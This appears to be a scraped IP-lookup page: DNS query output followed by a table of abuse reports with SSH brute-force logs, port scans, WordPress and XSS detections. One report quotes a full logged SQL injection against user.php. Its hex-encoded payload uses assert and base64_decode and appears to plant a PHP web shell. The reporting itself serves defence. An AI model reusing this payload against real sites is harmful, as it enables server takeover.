城市(city): unknown
省份(region): unknown
国家(country): United States
运营商(isp): unknown
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
b; <<>> DiG 9.10.3-P4-Ubuntu <<>> 207.163.112.140
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 39507
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;207.163.112.140. IN A
;; AUTHORITY SECTION:
. 2804 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2019082501 1800 900 604800 86400
;; Query time: 0 msec
;; SERVER: 67.207.67.2#53(67.207.67.2)
;; WHEN: Mon Aug 26 09:16:51 CST 2019
;; MSG SIZE rcvd: 119Host 140.112.163.207.in-addr.arpa. not found: 3(NXDOMAIN)Server: 67.207.67.2
Address: 67.207.67.2#53
** server can't find 140.112.163.207.in-addr.arpa: NXDOMAIN| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 91.243.93.44 | attackspam | B: zzZZzz blocked content access |
2019-11-18 04:55:41 |
| 185.164.2.135 | attackspambots | Automatic report - Port Scan Attack |
2019-11-18 05:04:32 |
| 104.148.105.5 | attack | Web app attack & sql injection attempts.
Date: 2019 Nov 17. 18:11:58
Source IP: 104.148.105.5
Portion of the log(s):
104.148.105.5 - [17/Nov/2019:18:11:57 +0100] "POST /ysyqq.php HTTP/1.1" 404 548 "http://[removed].hu/ysyqq.php" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
104.148.105.5 - [17/Nov/2019:18:11:56 +0100] GET /user.php?act=login HTTP/1.1" 404 548 "45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:\x22num\x22;s:297:\x22*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A336C7A655846784C6E426F634363734A7A772F63476877494756325957776F4A46395154314E5557336C7A655630704F79412F506963702729293B2F2F7D787878,10-- -\x22;s:2:\x22id\x22;s:11:\x22-1' UNION/*\x22;}45ea207d7a2b68c49582d2d22adf953a"
104.148.105.5 - [17/Nov/2019:18:11:56 +0100] POST /fqopr.php
104.148.105.5 - [17/Nov/2019:18:11:56 +0100] POST /fdgq.php
104.148.105.5 - [17/Nov/2019:18:11:56 +0100] GET /user.php?act=login .... |
2019-11-18 05:01:17 |
| 140.143.196.66 | attack | Nov 17 21:18:05 ns381471 sshd[18104]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.196.66 Nov 17 21:18:07 ns381471 sshd[18104]: Failed password for invalid user squid from 140.143.196.66 port 47734 ssh2 |
2019-11-18 05:21:42 |
| 41.141.111.237 | attackbotsspam | ENG,WP GET /wp-login.php |
2019-11-18 05:19:53 |
| 14.215.165.131 | attack | Nov 17 14:36:57 *** sshd[28812]: Invalid user ftp from 14.215.165.131 |
2019-11-18 05:02:05 |
| 177.189.216.8 | attackspambots | $f2bV_matches |
2019-11-18 05:24:56 |
| 27.74.17.69 | attackspambots | Automatic report - Port Scan Attack |
2019-11-18 05:10:50 |
| 222.186.175.148 | attackspambots | Nov 17 22:11:58 eventyay sshd[5913]: Failed password for root from 222.186.175.148 port 55718 ssh2 Nov 17 22:12:09 eventyay sshd[5913]: error: maximum authentication attempts exceeded for root from 222.186.175.148 port 55718 ssh2 [preauth] Nov 17 22:12:14 eventyay sshd[5920]: Failed password for root from 222.186.175.148 port 50934 ssh2 ... |
2019-11-18 05:13:48 |
| 182.1.99.41 | attackbotsspam | [Sun Nov 17 21:35:45.131681 2019] [:error] [pid 6329:tid 139864164169472] [client 182.1.99.41:43112] [client 182.1.99.41] ModSecurity: Access denied with code 403 (phase 2). detected XSS using libinjection. [file "/etc/modsecurity/owasp-modsecurity-crs-3.2.0/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "761"] [id "941101"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: https://karangploso.jatim.bmkg.go.id/OneSignalSDKWorker.js?appId=cc4b4b58-d602-4719-be42-28414d733f7f found within REQUEST_HEADERS:Referer: https://karangploso.jatim.bmkg.go.id/OneSignalSDKWorker.js?appId=cc4b4b58-d602-4719-be42-28414d733f7f"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [tag "paranoia-level/2"] [hostname "karangploso.jatim ... |
2019-11-18 05:32:47 |
| 83.171.107.216 | attack | Nov 17 16:54:08 eventyay sshd[1810]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=83.171.107.216 Nov 17 16:54:10 eventyay sshd[1810]: Failed password for invalid user netadmin from 83.171.107.216 port 2705 ssh2 Nov 17 16:58:15 eventyay sshd[1867]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=83.171.107.216 ... |
2019-11-18 05:05:30 |
| 157.230.55.177 | attack | WordPress login Brute force / Web App Attack on client site. |
2019-11-18 05:07:18 |
| 129.158.71.3 | attackspam | Nov 17 16:24:21 meumeu sshd[24812]: Failed password for backup from 129.158.71.3 port 61023 ssh2 Nov 17 16:28:16 meumeu sshd[25460]: Failed password for root from 129.158.71.3 port 22712 ssh2 Nov 17 16:32:06 meumeu sshd[25987]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=129.158.71.3 ... |
2019-11-18 04:59:53 |
| 138.197.213.233 | attackspambots | Nov 17 04:32:56 wbs sshd\[25498\]: Invalid user fsc from 138.197.213.233 Nov 17 04:32:57 wbs sshd\[25498\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.197.213.233 Nov 17 04:32:58 wbs sshd\[25498\]: Failed password for invalid user fsc from 138.197.213.233 port 53410 ssh2 Nov 17 04:36:59 wbs sshd\[25805\]: Invalid user piet from 138.197.213.233 Nov 17 04:36:59 wbs sshd\[25805\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.197.213.233 |
2019-11-18 05:00:47 |
| 190.245.150.246 | attack | Port scan on 1 port(s): 23 |
2019-11-18 05:31:01 |